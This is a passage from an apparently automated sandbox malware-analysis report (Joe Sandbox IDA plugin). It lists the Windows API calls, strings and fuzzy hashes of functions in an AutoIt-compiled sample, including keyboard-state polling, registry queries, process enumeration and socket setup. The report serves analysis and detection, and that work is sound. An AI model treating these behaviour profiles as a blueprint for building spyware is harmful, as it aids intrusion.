                                                      • Part of subcall function 0037D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0037D4D9,?,?,?), ref: 0037D419
                                                      • Part of subcall function 0037D3F7: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0037D4D9,?,?,?,?,003541AF,003D4600,00000002), ref: 0037D42E
                                                      • Part of subcall function 0037D3F7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0037D4D9,?,?,?,?,003541AF,003D4600,00000002), ref: 0037D43A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: File$Pointer$Write
                                                    • String ID:
                                                    • API String ID: 3847668363-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID:
                                                    • API String ID: 176396367-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetShortPathNameW.KERNELBASE ref: 0037E7A2
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Similarity
                                                    • API ID: NamePathShort_wcslen
                                                    • String ID:
                                                    • API String ID: 2021730007-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003139FD
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Similarity
                                                    • API ID: LongNamePath_wcslen
                                                    • String ID:
                                                    • API String ID: 541455249-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0037E76C
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Similarity
                                                    • API ID: FolderPath_wcslen
                                                    • String ID:
                                                    • API String ID: 2987691875-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00353A1C), ref: 00317973
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0037D9DC,?,?), ref: 0037DA72
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00350AA4,?,?,00000000,?,00350AA4,00000000,0000000C), ref: 00350757
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,0037D755), ref: 0037E9C6
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,766861D0,?,00000000), ref: 0038A11B
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0038A176
                                                    • FindClose.KERNEL32(00000000), ref: 0038A181
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0038A19D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038A1ED
                                                    • SetCurrentDirectoryW.KERNEL32(003D7B94), ref: 0038A20B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0038A215
                                                    • FindClose.KERNEL32(00000000), ref: 0038A222
                                                    • FindClose.KERNEL32(00000000), ref: 0038A232
                                                      • Part of subcall function 0037E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0037E2C9
                                                    Strings
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0039D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039C00D,?,?), ref: 0039D314
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D350
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3C7
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3FD
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039C89D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0039C908
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039C92C
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0039C98B
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0039CA46
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0039CAB3
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0039CB48
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0039CB99
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0039CC42
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0039CCE1
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039CCEE
                                                    Similarity
                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 3102970594-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0037A572
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 0037A5F3
                                                    • GetKeyState.USER32(000000A0), ref: 0037A60E
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 0037A628
                                                    • GetKeyState.USER32(000000A1), ref: 0037A63D
                                                    • GetAsyncKeyState.USER32(00000011), ref: 0037A655
                                                    • GetKeyState.USER32(00000011), ref: 0037A667
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0037A67F
                                                    • GetKeyState.USER32(00000012), ref: 0037A691
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 0037A6A9
                                                    • GetKeyState.USER32(0000005B), ref: 0037A6BB
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CoInitialize.OLE32 ref: 003940D1
                                                    • CoUninitialize.OLE32 ref: 003940DC
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,003B0B44,?), ref: 00394136
                                                    • IIDFromString.OLE32(?,?), ref: 003941A9
                                                    • VariantInit.OLEAUT32(?), ref: 00394241
                                                    • VariantClear.OLEAUT32(?), ref: 00394293
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 636576611-1287834457
                                                    • Opcode ID: 7ec9e64963389ee6e5ddc00459431bf86d840a6a039b1721388adf8345157492
                                                    • Instruction ID: 7532c9bda4965228aeba597d967e6dcfe19481030003b72bd0306b9a857a2c64
                                                    • Opcode Fuzzy Hash: 7ec9e64963389ee6e5ddc00459431bf86d840a6a039b1721388adf8345157492
                                                    • Instruction Fuzzy Hash: 8F61A0712083119FCB12DF65D849F9ABBE8FF49714F100849F9859B291D770ED85CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0038A4D5
                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0038A5E8
                                                      • Part of subcall function 003841CE: GetInputState.USER32 ref: 00384225
                                                      • Part of subcall function 003841CE: PeekMessageW.USER32 ref: 003842C0
                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0038A505
                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0038A5D2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                    • String ID: *.*
                                                    • API String ID: 1972594611-438819550
                                                    • Opcode ID: d93ec1669b6ea30ff6eb540c13d141d7333ab36d197bfb783892b20bb120e6d6
                                                    • Instruction ID: b302b4c0e34b68febd3394c6e3658b1717e28ff17cc049ef2bcb80afafb11add
                                                    • Opcode Fuzzy Hash: d93ec1669b6ea30ff6eb540c13d141d7333ab36d197bfb783892b20bb120e6d6
                                                    • Instruction Fuzzy Hash: AC41717190030AAFDF16EFA4DC49AEEBBB8EF0A310F144097E445A7191D7349E84CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DefDlgProcW.USER32(?,?), ref: 003122EE
                                                    • GetSysColor.USER32(0000000F), ref: 003123C3
                                                    • SetBkColor.GDI32(?,00000000), ref: 003123D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Color$Proc
                                                    • String ID:
                                                    • API String ID: 929743424-0
                                                    • Opcode ID: 88ea79a1b6912419e604dd25792d81ee6a076c02f1975f2c0e5d8f6552b15c41
                                                    • Instruction ID: b221af4226dfc87f59d0ce757bbc116dd4bc5d2248e8b8007a1cad9e3a957e80
                                                    • Opcode Fuzzy Hash: 88ea79a1b6912419e604dd25792d81ee6a076c02f1975f2c0e5d8f6552b15c41
                                                    • Instruction Fuzzy Hash: A3815BF1204454BEE62F663D8C9CEFF154DDB4F341F120A09F512D99A1CB298EA6D632
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003939AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003939D7
                                                      • Part of subcall function 003939AB: _wcslen.LIBCMT ref: 003939F8
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003921BA
                                                    • WSAGetLastError.WSOCK32 ref: 003921E1
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00392238
                                                    • WSAGetLastError.WSOCK32 ref: 00392243
                                                    • closesocket.WSOCK32(00000000), ref: 00392272
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 1601658205-0
                                                    • Opcode ID: c28c8dc1371b05f89f51b2ddab4ff597ad1a6b3db1cdbfc68b7892f5774a111c
                                                    • Instruction ID: 546c4160e8065c7c470e39c0f85f9e9e87157b271b6e05ff900c8fb042399289
                                                    • Opcode Fuzzy Hash: c28c8dc1371b05f89f51b2ddab4ff597ad1a6b3db1cdbfc68b7892f5774a111c
                                                    • Instruction Fuzzy Hash: 2751C375600210AFDB16AF24C886F6A77E9AF09714F098048F956AF3D3C771ED418BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: e6e6333d4fae502abde291cfd952b17e3e3f2c260e92c777e179409a6fcc39bf
                                                    • Instruction ID: ee13052d26c587e3849276f5b45883d02393624d8d94175202b054cfaae95726
                                                    • Opcode Fuzzy Hash: e6e6333d4fae502abde291cfd952b17e3e3f2c260e92c777e179409a6fcc39bf
                                                    • Instruction Fuzzy Hash: 5921E5317012509FD7168F1AC854B57BBD9FF97314F598068E84ACB261DB72EC42CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0039B00B
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0039B019
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0039B0FB
                                                    • CloseHandle.KERNEL32(00000000), ref: 0039B10A
                                                      • Part of subcall function 0032E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00354D4D,?), ref: 0032E30F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                    • String ID:
                                                    • API String ID: 1991900642-0
                                                    • Opcode ID: 8c7415af4991312ea84d007cd82f52af41e171bf5811913ab991b34610d8ee8a
                                                    • Instruction ID: ab9aa408c073003eaaaafe861bcf357b49cca4f4ea6f420c8da598b225340adf
                                                    • Opcode Fuzzy Hash: 8c7415af4991312ea84d007cd82f52af41e171bf5811913ab991b34610d8ee8a
                                                    • Instruction Fuzzy Hash: 5E517B75508310AFC715EF24D886AABBBE8FF88754F00491DF989DB251EB70D904CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0036E60A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID: X64
                                                    • API String ID: 2645101109-893830106
                                                    • Opcode ID: ea36817150db254eca74a2938e537a27a421f9fe7d5725ebc10c6863123ed815
                                                    • Instruction ID: 4a785b936329728324f6754452d50d7c5996d6f5edd71d9dfe6e6c22436399f0
                                                    • Opcode Fuzzy Hash: ea36817150db254eca74a2938e537a27a421f9fe7d5725ebc10c6863123ed815
                                                    • Instruction Fuzzy Hash: F3D0C9B481112DEACBA1CB90EC88DDD737CBB14304F104151F106A2400DB3495488B10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: 48e4bafab684083f53c6c49daf46e7b8f15c1afd08d06f7ef6a1aeb6de69b02d
                                                    • Instruction ID: 40d2d1769254b5c2c792501f18439947251a48d63b2a92094f2052a334768fdb
                                                    • Opcode Fuzzy Hash: 48e4bafab684083f53c6c49daf46e7b8f15c1afd08d06f7ef6a1aeb6de69b02d
                                                    • Instruction Fuzzy Hash: B6D05BB515C10078E43F4ABC4D1FF760E4CF30A751F4586D9B20BE5DA4E5DD9900A125
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 0039309B
                                                    • SystemParametersInfoW.USER32 ref: 003931C7
                                                    • SetRect.USER32 ref: 00393206
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00393216
                                                    • CreateWindowExW.USER32 ref: 0039325D
                                                    • GetClientRect.USER32 ref: 00393269
                                                    • CreateWindowExW.USER32 ref: 003932B2
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003932C1
                                                    • GetStockObject.GDI32(00000011), ref: 003932D1
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003932D5
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003932E5
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003932EE
                                                    • DeleteDC.GDI32(00000000), ref: 003932F7
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00393323
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0039333A
                                                    • CreateWindowExW.USER32 ref: 0039337A
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0039338E
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0039339F
                                                    • CreateWindowExW.USER32 ref: 003933D4
                                                    • GetStockObject.GDI32(00000011), ref: 003933DF
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003933EA
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003933F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 52f2c9cd358cce8bbad556bc36fc7622a6cd5c01d5fa13e83b4ba9ce87498100
                                                    • Instruction ID: b6fd738c3f1a9645f5f34f8213eee0815e1744729ef444c4e5f5bfc5a0bd3c68
                                                    • Opcode Fuzzy Hash: 52f2c9cd358cce8bbad556bc36fc7622a6cd5c01d5fa13e83b4ba9ce87498100
                                                    • Instruction Fuzzy Hash: 81B13CB5A40205AFEB15DF68DC89EAB7BADEB09710F004115F915AB2A0DB74AD40CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 003A0C44
                                                    • _wcslen.LIBCMT ref: 003A0C7E
                                                    • _wcslen.LIBCMT ref: 003A0CE8
                                                    • _wcslen.LIBCMT ref: 003A0D50
                                                    • _wcslen.LIBCMT ref: 003A0DD4
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003A0E24
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003A0E63
                                                      • Part of subcall function 0032FD60: _wcslen.LIBCMT ref: 0032FD6B
                                                      • Part of subcall function 00372ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00372AE8
                                                      • Part of subcall function 00372ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00372B1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 1103490817-719923060
                                                    • Opcode ID: 479528136f41a2b584d0b88fdaf7c04d35e31ff05a7463ef52ac738b2a8a70d7
                                                    • Instruction ID: 431f8987995723c4aec396219da1f14f24005c2c4febd973f64c7a4e12d1cad1
                                                    • Opcode Fuzzy Hash: 479528136f41a2b584d0b88fdaf7c04d35e31ff05a7463ef52ac738b2a8a70d7
                                                    • Instruction Fuzzy Hash: 61E1D1322143418FC71AEF28C44086AB7E6FF9A314F15896DF8969B7A1DB30ED45CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SystemParametersInfoW.USER32 ref: 0031259A
                                                    • GetSystemMetrics.USER32 ref: 003125A2
                                                    • SystemParametersInfoW.USER32 ref: 003125CD
                                                    • GetSystemMetrics.USER32 ref: 003125D5
                                                    • GetSystemMetrics.USER32 ref: 003125FA
                                                    • SetRect.USER32 ref: 00312617
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00312627
                                                    • CreateWindowExW.USER32 ref: 0031265A
                                                    • SetWindowLongW.USER32 ref: 0031266E
                                                    • GetClientRect.USER32 ref: 0031268C
                                                    • GetStockObject.GDI32(00000011), ref: 003126A8
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003126B3
                                                      • Part of subcall function 003119CD: GetCursorPos.USER32(?,?,00000000,00000000,?,003126C6,00000000,000000FF,?,?,?), ref: 003119E1
                                                      • Part of subcall function 003119CD: ScreenToClient.USER32 ref: 003119FE
                                                      • Part of subcall function 003119CD: GetAsyncKeyState.USER32(00000001), ref: 00311A23
                                                      • Part of subcall function 003119CD: GetAsyncKeyState.USER32(00000002), ref: 00311A3D
                                                    • SetTimer.USER32 ref: 003126DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 57b84302b0ead8b21369211c9d18d4e514c1be8370158004b7bb07c151e6d984
                                                    • Instruction ID: fb54e9eacb9f114ea21f22d237d7fb1c03caea1f81b9fc6ca737d827e5986f42
                                                    • Opcode Fuzzy Hash: 57b84302b0ead8b21369211c9d18d4e514c1be8370158004b7bb07c151e6d984
                                                    • Instruction Fuzzy Hash: 89B18C71A002099FDB1ADFA8CC85BEE7BB9EB49311F114219FE169B2E0D770D950CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _wcslen.LIBCMT ref: 003A8CB9
                                                    • _wcslen.LIBCMT ref: 003A8CCD
                                                    • _wcslen.LIBCMT ref: 003A8CF0
                                                    • _wcslen.LIBCMT ref: 003A8D13
                                                    • LoadImageW.USER32 ref: 003A8D51
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003A6551), ref: 003A8DAD
                                                    • LoadImageW.USER32 ref: 003A8DE6
                                                    • LoadImageW.USER32 ref: 003A8E29
                                                    • LoadImageW.USER32 ref: 003A8E60
                                                    • FreeLibrary.KERNEL32(?), ref: 003A8E6C
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003A8E7C
                                                    • DestroyIcon.USER32(?,?,?,?,?,003A6551), ref: 003A8E8B
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003A8EA8
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003A8EB4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                    • String ID: .dll$.exe$.icl$Qe:
                                                    • API String ID: 799131459-2273183642
                                                    • Opcode ID: d309f80d6ab917d3d8649c77f03f233493525bf1795d6771cd4371345e7628c9
                                                    • Instruction ID: 7dbb1ff1826de41f778e5f17092bc7cf68e52c21b4c63bc0f04f424c3a86abdc
                                                    • Opcode Fuzzy Hash: d309f80d6ab917d3d8649c77f03f233493525bf1795d6771cd4371345e7628c9
                                                    • Instruction Fuzzy Hash: 7A61BD71600215FAEB169F64CC81FFE77ACFB1A710F104606F916DA1D1DB74A990CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00384852
                                                    • _wcslen.LIBCMT ref: 0038485D
                                                    • _wcslen.LIBCMT ref: 003848B4
                                                    • _wcslen.LIBCMT ref: 003848F2
                                                    • GetDriveTypeW.KERNEL32(?), ref: 00384930
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00384978
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003849B3
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003849E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
